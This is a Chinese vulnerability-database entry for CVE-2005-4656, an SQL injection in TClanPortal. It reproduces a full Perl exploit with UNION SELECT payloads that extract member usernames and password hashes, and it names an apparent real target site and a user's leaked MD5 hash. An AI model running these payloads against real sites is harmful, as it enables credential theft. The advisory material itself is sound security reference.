CVE-2005-4656
CVSS5.0
发布时间 :2005-12-31 00:00:00
修订时间 :2011-03-07 21:28:45
NMCOE    

[原文]SQL injection vulnerability in index.php in TClanPortal 1.1.3 and earlier allows remote attackers to execute arbitrary SQL commands, and retrieve all usernames and passwords, via the id parameter.


[CNNVD]TriggerTG TClanPortal Index.PHP SQL注入漏洞(CNNVD-200512-898)

        TClanPortal 1.1.3及更早版本的index.php存在SQL注入漏洞,远程攻击者可以通过id参数来执行任意SQL命令并获取所有用户名和密码。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4656
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4656
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-898
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/22869
(UNKNOWN)  XF  tclanportal-index-sql-injection(22869)
http://www.vupen.com/english/advisories/2005/2187
(UNKNOWN)  VUPEN  ADV-2005-2187
http://www.securityfocus.com/bid/15173
(UNKNOWN)  BID  15173
http://secunia.com/advisories/17324
(VENDOR_ADVISORY)  SECUNIA  17324
http://downloads.securityfocus.com/vulnerabilities/exploits/TClanPortal_sql_inj.pl
(UNKNOWN)  MISC  http://downloads.securityfocus.com/vulnerabilities/exploits/TClanPortal_sql_inj.pl
http://www.osvdb.org/20305
(UNKNOWN)  OSVDB  20305

- 漏洞信息

TriggerTG TClanPortal Index.PHP SQL注入漏洞
中危 SQL注入
2005-12-31 00:00:00 2006-01-17 00:00:00
远程  
        TClanPortal 1.1.3及更早版本的index.php存在SQL注入漏洞,远程攻击者可以通过id参数来执行任意SQL命令并获取所有用户名和密码。

- 公告与补丁

        

- 漏洞信息 (1273)

TClanPortal <= 1.1.3 (id) Remote SQL Injection Exploit (EDBID:1273)
php webapps
2005-10-26 Verified
0 Devil-00
N/A [点击下载]
# TClanPortal Version 3 ..
# Search By Google :-
# by TriggerTG.de 2003 - Version 3
#
# Gr33tz :-
#         Abducter .. SQL Injection's FOunder   - | abducter_minds76@hotmail.com |-
#         Devil-00 .. SQL Injection's Exploting - | devil-00@s4a.cc | -
#         Security4Arab .. A'Where Home .. WE LOVE S4A FOR EVER :P
#         HACKERS PAL ..
#         Yes2Hack ..
#         WwW.Sqor.NeT
#         WwW.S4a.Cc
#         WwW.SecurityGurus.NeT
#
#
#
# This Injection's Whene Prefix = "";
#
# 1- SQL Injection
# /ClanPortal/linkdl/index.php?action=relatedlink&id=-1%20UNION%20SELECT%20pw,name,null,name,name,name%20FROM%20member%20%20WHERE%20id=1/*
# http://yahzee.ya.funpic.de/ClanPortal/
#
# Richard
# d38b89019f0496a4e67bfbe95cbcba0f    - MD5
#
# 2- SQL Injection
# /linkdl/index.php?action=bewerten&id=-1%20UNION%20SELECT%20pw,null,null%20FROM%20member%20%20WHERE%20id=1/*
# [!] GET Password
#
#
# /linkdl/index.php?action=bewerten&id=-1%20UNION%20SELECT%20name,null,null%20FROM%20member%20%20WHERE%20id=1/*
# [!] GET Username
#
# [!] Perl Code By Devil-00 | devil-00@s4a.cc |
#------------------------------------------------------------------------------------------------------------

use LWP::Simple;

print "\n\n==========================================\n";
print "\n= Exploit for TClanPortal Version 3            ";
print "\n= Coded By Devil-00 | devil-00@s4a.cc |        ";
print "\n= Gr33tz :-                                                            ";
print "\n= Abducter .. SQL Injection's FOunder   - | abducter_minds76@hotmail.com |-            ";
print "\n= Devil-00 .. SQL Injection's Exploting - | devil-00@s4a.cc | -        ";
print "\n= Security4Arab .. A'Where Home .. WE LOVE S4A FOR EVER :P             ";
print "\n= HACKERS PAL ..                                                       ";
print "\n= Yes2Hack ..                                                          ";
print "\n= WwW.Sqor.NeT                                                         ";
print "\n= WwW.S4a.Cc                                                           ";
print "\n= WwW.SecurityGurus.NeT                                        ";
print "\n============================================\n\n";

if(!$ARGV[0] or !$ARGV[1]) {
  print "Usage:\nperl $0 [Full-Path] [SQL Prefix] [User ID]\n\nExample:\nperl $0 http://yahzee.ya.funpic.de/ClanPortal/ 1\n";
  exit(0);
}
$url = "/linkdl/index.php?action=relatedlink&id=-1%20UNION%20SELECT%20pw,name,null,name,name,name%20FROM%20member%20%20WHERE%20id=$ARGV[1]/*";
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/<a href='(.*?)' target='_parent'>/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);
$page =~ m/<b>Name:<\/b> <a href='index\.php\?action=kat&id=0'>(.*?)<\/a>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);

# milw0rm.com [2005-10-26]
		

- 漏洞信息

20305
TClanPortal index.php id Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Unknown

- 漏洞描述

TClanPortal contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'index.php' script not properly sanitizing user-supplied input to the 'id' variable. This may allow a remote attacker to inject or manipulate SQL queries in the back-end database.

- 时间线

2005-10-25 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站